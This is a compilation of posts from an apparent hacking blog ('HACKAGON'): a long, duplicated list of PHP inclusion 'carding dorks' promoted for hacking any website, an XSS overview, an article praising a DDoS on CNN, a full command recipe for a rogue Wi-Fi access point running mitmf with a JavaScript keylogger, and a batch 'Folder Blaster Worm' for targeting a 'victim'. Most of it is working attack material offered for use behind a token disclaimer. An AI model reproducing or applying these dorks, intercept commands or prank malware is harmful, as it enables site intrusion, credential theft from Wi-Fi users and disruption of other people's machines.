gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?bOdy=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?bOdy=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?bOdy=
include.php?go=
index3.php?nivel=
sub*.php?include=
path.php?numero=
principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path=”
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
com_extended_registration
smarty_config.php?root_dir= “smarty”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= “send_reminders.php?includedir=”
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
[Script Path]/admin/index.php?o= admin/index.php”;
/admin/index.php?o= admin/index.php”;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefixpage.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?bOdy=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?bOdy=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?bOdy=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?bOdy=
include.php?go=
index3.php?nivel=
sub*.php?include=
path.php?numero=
principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path=”
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
com_extended_registration
smarty_config.php?root_dir= “smarty”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= “send_reminders.php?includedir=”
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
[Script Path]/admin/index.php?o= admin/index.php”;
/admin/index.php?o= admin/index.php”;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefix

So above is all latest sqli carding dorks of 2017-18. these are all 5000+ latest sqli carding dorks 2017. By using these carding dorks you can do hack any website.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope HACKAGON have provided the Latest Carding Dorks 2017. So, stay secure and keep learning and if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Cross-Site Scripting (XSS) is a form of security vulnerability typically found in web applications. XSS Attack enables attackers to inject malicious scripts into the web pages viewed by other users. XSS attacks are one of the most prevalent forms of Web Attack, Accounting for an astonishing 12.75% of all web attacks.

What Is Cross-Site Scripting (XSS) ?

XSS is a security abbreviation for Cross Site Scripting. Prominent sites affected by XSS Attacks in the past include; Twitter, Facebook, MySpace & Youtube. In recent years, XSS vulnerabilities have become one of the most prevalent exploited security vulnerabilities. Approximately 70% of all web vulnerabilities are XSS related.

How Does An XSS Attack Work ?

Step #1 Hackers design a malicious script usually with the purpose of mining user data like usernames, passwords or billing details.

Step #2 Hackers inject the malicious script into a legitimate website, The script acts as a hidden layer to the user, similar to the concept behind an illicit ATM Skimmer.

Step #3 Hackers then receive feedback from the script, successfully harvesting user data.

Types Of XSS Attacks

1. Reflected Attack (Type-II XSS / Non-Persistent XSS): A reflected Attack is where the injected script is reflected off a web server as a request, such as a normal search result, error message or subsequent link. Reflected attacks target users differently, often masquerading in emails or hidden links. The browser executes the code because it came from a ‘trusted’ server.

2. Stored Attack (Type-I XSS / Persistent XSS): A stored Attack is the script that is injected and stored on the target servers, such as in a comment, database or forum. The script may then be executed while a legitimate user is using the site.

XSS Attack Statistics

XSS Attack Statistics

Mitigation

1. Blacklisting & Whitelisting: Two very basic techniques you can use to sanitize incoming data similar to that of parameterized inputs for migrating SQL Injection Attacks; Whitelisting uses a list of approved data, that can only be executed. Whitelisting is the most secure. Blacklisting uses a list of prohibited data to exclude from execution.

2. Application Security: At its core Barricade works like an early warning system against any attempts at breaching the security of your servers. By using attack mitigation products like Barricade you can be a step ahead of the game. Barricade quietly watches in the background and can identify any security threats. In the event, there is any serious activity Barricade notifies you and provide detailed steps needed to solve the situation.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope HACKAGON have provided a healthy knowledge about XSS Attack. So, stay secure and keep learning and if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


“GHOST SQUAD HACKERS TOOK DOWN CNN WEBSITE” On Saturday of April 16th, the Anonymous collective, Ghost Squad Hackers DDoS’d CNN’s website into oblivion and remained down until the following day. The group has been in contact with The Last American Vagabond for the month of April so far, and have given us scoops on some of their recent hacks, including a massive dox release on the Israeli Defense Force in an attempt to shed more light on the Zionist/Imperialist agenda that is decimating the Middle East.

Ghost Squad Hackers Take Down CNN Website

Having a conversation with HACKAGON, A member of Ghost Squad Hackers, an Anonymous-Affiliated Group told us that the group Targeted CNN websites in the response of the silence of Palestine.

Take a look below at Hacked CNN Website

cnn website hacked

Message to CNN: http://www.cnn.com.br/ #TangoDown #GhostSquadHackers ~ CNN your security has been breached by Ghost Squad Hackers. We’ll make sure the media outlets that matter receives the message ~ We are Ghost Squad Hackers Expect Us, … or don’t.

Claiming that the Mainstream Media is dying and obsolete, Ghost Squad shared in their communication that they had an utmost respect for independent and authentic media and that this was the inspiration for their attack on CNN, part of what they are calling, Operation: SILENCE or #OpSilence. Ghost Squad stated that they intended for this to be just the beginning–highlighting Fox News as the next target–that the Mainstream Media has become one of the biggest and most blatant oppositions towards citizens, with its funding from the same corporate elitists that are funding the political campaigns of practically all politicians in office in some way. They also questioned why more so-called Anons were not seeking this type of expression and activism, seeming to imply that at the Ghost Squad, they shared our sentiments of confusion by the recent actions of other Anonymous factions. This begs speculation of how much the Anonymous movement has been divided by things like disinformation, convoluted personal agendas, and even Government Intelligence connections.

Through our communication, The Last American Vagabond has come to believe in the authenticity of the Ghost Squad Hackers. The Vagabond does not know anything about these hackers other than their collective’s basic info, but the idea of these hackers being Government Intel or some type of computer-bot is entirely implausible at this point, the only room for possibility left being that one can never rule anything out entirely.

Thus far, the Ghost Squad has been entertaining with their traditional hacker smugness and confidence, and here at the Vagabond, we are increasingly intrigued by the hackers’ unfolding plan. Hopefully, this could mark a change in how hacktivism and hackers interact with the media. It is time to cut out the corporate middleman of the mainstream and go right to the citizens who are ready and deserving of real activism and real information, and this means dealing with independent media. As well, it is time to hold higher standards and a greater sense of accountability for hackers calling themselves “activists”–because a great deal of these people using these altruistic terms seems to have very personalized agendas.

As an afterthought, #OpSilence could certainly be considered by skeptics as an infringement on the Freedom of Speech, but realistically, these are the rules of Man and not of Nature. One has the Freedom of Speech, as far as Natural Law goes, until someone decides to revoke that freedom from them, and this is often something that is decided simply by the whim of the majority. Today, there is an increasingly overwhelming amount of American citizens who are completely fed up with the heavy slants and spins given to the information that is paid to make its way into their living rooms–and things like Bill O’Reilly’s “No-Spin Zone” is something so insidious and discredited that it is physically sickening to watch. The point of the matter is this: only when looking at the fight from the angle of the Elitist is this an infringement of free speech, and in reality, this is the reclamation of free speech. The Freedom of Speech was infringed upon when Corporate America took their citizen’s media and information away from them and began distorting it with their monetized agendas.

While there surely should have been better methods for handling this in the past, it is quite possible that the direct approach the Ghost Squad Hackers are taking could be one of the only approaches left when dealing with the outright collective disease that the Mainstream Media has become.

We hope that HACKAGON provided a knowledgeable article to our multitude readers. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


A rogue access point (also called rogue AP), is any Wi-Fi access point that is installed on a network but is not authorized for operation on that network and is not under the management of the network administrator. Rogue access points often do not conform to wireless LAN (WLAN) security policies, and additionally, can allow anyone with a Wi-Fi device to connect to your network. So, Learn How To Create Rogue Access Point For Attack In Kali Linux.

Create Rogue Access Point For Attack In Kali Linux

Let’s Understand The Rogue Access Point With Infographics

rogue access point

Steps To Create Rogue Access Point For Attack In Kali Linux

1. Install isc-dhcp-server

apt-get install isc-dhcp-server

2. set monitor mode

airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon

3. Configure dhcpd.conf

leafpad /etc/dhcp/dhcpd.conf
authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 192.168.2.0 netmask 255.255.255.0 {
option routers 192.168.2.1;
option subnet-mask 255.255.255.0;
option domain-name “FreeWifi”;
option domain-name-servers 61.XXX.XXX.1,61.XXX.XXX.1,192.168.1.1;
range 192.168.2.100 192.168.2.110;
}

4. Create fake AP using airbase-ng

airbase-ng -e FreeWifi -c 6 wlan0mon

5. Configure at0 interface

ifconfig at0 up
ifconfig at0 192.168.2.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables –append FORWARD –in-interface at0 -j ACCEPT
iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

6. Start DHCP Server

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start

7. Run mitmf

mitmf -i at0 –spoof –arp –gateway 192.168.2.1 –jskeylogger –hsts

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, Hope HACKAGON have provided one of the best way to Create Rogue Access Point For Attack. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Annoy your Friend/Victim with your own Folder Blaster Worm.

Folder Blaster Worm

What Is A Folder Blaster Worm?

Folder Blaster Worm is a batch file that opens up the bunch of applications all at once but it doesn’t allow you to close them.

How Does The Folder Blaster Worm Work?

The logic behind Folder Blaster is to create and open a lot of folders with an infinite loop and the best part of this folder blaster is that it disallow the victims from closing the generated folders.

How Do You Create A Folder Blaster Worm?

  1. Begin with opening up a new text file and turning off echo by typing “@echo off”.
  2. Then change the directory to Desktop by typing “cd ./Desktop”.
  3. Now create 10 folders with names 0-9 by typing “md 0”, “md 1” and so on.
  4. Now type anything after a colon, for example, :confirm. You then set up a label.
  5. Now start opening up all the 10 folders by typing “start 0”, “start 1” and so on. Now the final statement causes an infinite loop by typing “goto” and the words you typed in earlier, for example, goto confirm.

What Countermeasures Should We Take?

Unfortunately, there aren’t any countermeasures that someone can take to prevent this from happening to them but luckily this isn’t a deadly worm, it won’t cause your computer to crash, it’s merely an annoying trick. On the upside, it is an easy fix if it happens to you. All that needs to be done is for you to go to your task manager and end the task of the CMD file.

Most of the commands we use to make batch files are actually the same commands first implemented in MS-DOS (An ancient Microsoft OS). These DOS (Disk Operating System) commands can also be used in the command prompt window. Whatever your batch file does, you can do it through the command line interface (CLI).

Start “Run”, or simply hit [Windows key + R]. Type “cmd”, and you’re presented with the CLI. You can type “help” to get a list of commonly used commands and their functions. I recommend you try out each and every single command you can find. Hacking is getting more and more user-friendly every day, CLIs are being replaced by GUIs (Graphical User Interfaces) – meaning in most places you won’t have to actually type in the commands, you can just select an option and press a button. But as of now, this is a work in progress. With more advanced hacking techniques, especially the ones that involve using BackTrack tools, you will find that majority of the hacks are still done through the CLI. So, Before getting to the code, let’s take a look at a couple of commands.

md / mkdir:  Make Directory, This command is used to create a directory (a folder).

cd:  Change Directory, This command is used to change the current directory.

Here we’ve got the Folder Blaster Worm. Again, this one’s fairly easy to understand. What we’re doing below is creating a bunch of folders, opening them all at once and keeping them open, effectively hogging a big portion of the screen and memory causing the windows to lag, freeze up and sometimes crash.

@echo off
cd ./Desktop
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 0
:confirm
start 1
start 2
start 3
start 4
start 5
start 6
start 7
start 8
start 9
start 0
goto confirm

So, we beginning with turning off echo. Then we changed the directory to Desktop. Now we created ten folders with names 0-9. We set up the label and start opening up all the 10 folders. Now the final statement causes an infinite loop. Of course, if the folder is already opened it will not be opened again. But the use of this infinite loop is if the user attempts to close the folder, the loop is still going on and it will send a message to open that folder again. So the victim will be stuck as every time s/he closes a folder it opens up again, eventually making them give up and restart the system.

The above code can be made much shorter with the use of LOOPs, as discussed below. We’ll start by creating a variable and setting its value to 0. We are going to use this variable as a check to let the computer know when to come out of the loop. Take a look at the code first:

@echo off
set /a i=0
:loop
if %i%==10 goto end
echo This is iteration %i%.
set /a i=%i%+1
goto loop
:end

Where “set” is used to define and initialize a variable. Here we create a variable called “i” and set it’s value to zero. After setting up a label, we check if the value of the variable “i” (given by %i%) is equal to 10, and if it is we “goto” the label end (the program ends when this happens). Now we “echo” (send a message) to notify the user which iteration is currently running. In the next step, we increment the value of “i” by one and then go back to the “if” statement.

So the loop runs ten times (0-9) and then stops. The above was not a worm, but a simple program. Earlier, I told you that the above Folder Blaster worm code can be made shorter by using loops. You know how to make the worm, and now you know how to use loops. Combining the two of them, I leave as an exercise for the wannabe hacker.

(HINT: See the folder names up top going from 0-9 ? You can just replace them with %i% in the above loop & in the end don’t forget to save the file in .bat extension. )

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, Hope HACKAGON have provided one of the best worm/virus to have fun with your Friend’s/Victim. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.